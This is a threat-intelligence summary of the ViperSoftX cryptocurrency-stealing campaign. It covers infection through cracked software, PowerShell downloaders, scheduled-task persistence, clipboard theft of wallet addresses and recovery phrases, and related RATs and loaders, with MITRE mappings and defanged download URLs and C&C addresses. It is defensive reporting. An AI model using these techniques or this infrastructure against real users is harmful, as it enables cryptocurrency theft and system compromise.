Threat Research

ViperSoftX Stealing Cryptocurrencies

Ahnlab
ViperSoftX Stealing Cryptocurrencies

The ViperSoftX threat actor continues to distribute malware targeting cryptocurrency users, employing PowerShell scripts to install remote access tools and steal sensitive wallet information. The malware uses various infection methods, including disguised illegal software, and implements clipboard monitoring to capture cryptocurrency-related data. #ViperSoftX #QuasarRAT #PureCrypter #PureHVNC #ClipBanker

Keypoints

  • ViperSoftX malware is distributed mainly via disguised cracked software, keygens, or torrent sites, affecting users globally including South Korea.
  • It achieves persistence through task scheduler by executing Base64-encrypted PowerShell scripts and registry-stored commands periodically.
  • PowerShell scripts function as downloaders communicating with C&C servers, sometimes using DNS TXT record queries for payload retrieval.
  • ViperSoftX monitors clipboard content and active windows to steal cryptocurrency wallet addresses and BIP39 recovery phrases, sending stolen data via HTTP headers.
  • The malware executes commands including PowerShell commands, downloading and running executables, and self-removal, enhancing its operational flexibility.
  • Additional payloads distributed include Quasar RAT for remote access, PureCrypter as an executable loader with evasion features, and PureHVNC for system control.
  • ClipBanker malware complements ViperSoftX by replacing copied cryptocurrency wallet addresses with attacker-controlled addresses to redirect transactions.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used PowerShell scripts to download additional payloads and execute commands (“The decrypted and executed PowerShell command is a downloader”).
  • [T1071] Application Layer Protocol – Data exfiltration and C&C communication occur via HTTP headers ‘X-User-Agent’, ‘X-get’, and ‘X-notify’ (“Data transmitted to the C&C server is sent through the HTTP header fields”).
  • [T1140] Deobfuscate/Decode Files or Information – Malware decrypts Base64 encoded PowerShell scripts from files and registry entries before execution (“…decrypts it into Base64, and then executes it”).
  • [T1053] Scheduled Task/Job – Persistence is achieved by registering tasks in Task Scheduler to execute malicious scripts periodically (“ViperSoftX leverages task scheduler to periodically execute malicious PowerShell scripts”).
  • [T1115] Clipboard Data – Clipboard monitoring is used to capture cryptocurrency wallet addresses and BIP39 recovery phrases (“ViperSoftX monitors the clipboard to check whether the BIP 39 recovery phrase… has been copied”).
  • [T1083] File and Directory Discovery – Malware queries system information including installed browser extensions and programs (“It queries the lists of extensions of web browsers and installed programs and sends them to the C&C server”).
  • [T1204] User Execution – Initial infection vectors include disguised cracked software and keygens encouraging user execution (“ViperSoftX was often distributed under the guise of cracked software or key generators”).

Indicators of Compromise

  • [File Hashes] Examples of malware files – 064b1e45016e8a49eba01878e41ecc37, 0ed2d0579b60d9e923b439d8e74b53e1, and 3 more hashes.
  • [URLs] Malware download sources – http://136[.]243[.]132[.]112/ut[.]exe, http://136[.]243[.]132[.]112[:]881/3[.]exe.
  • [IP Addresses] Command and control servers – 136[.]243[.]132[.]112, 160[.]191[.]77[.]89, 185[.]245[.]183[.]74, 212[.]56[.]35[.]232, 89[.]117[.]79[.]31.

Read more: https://asec.ahnlab.com/en/88336/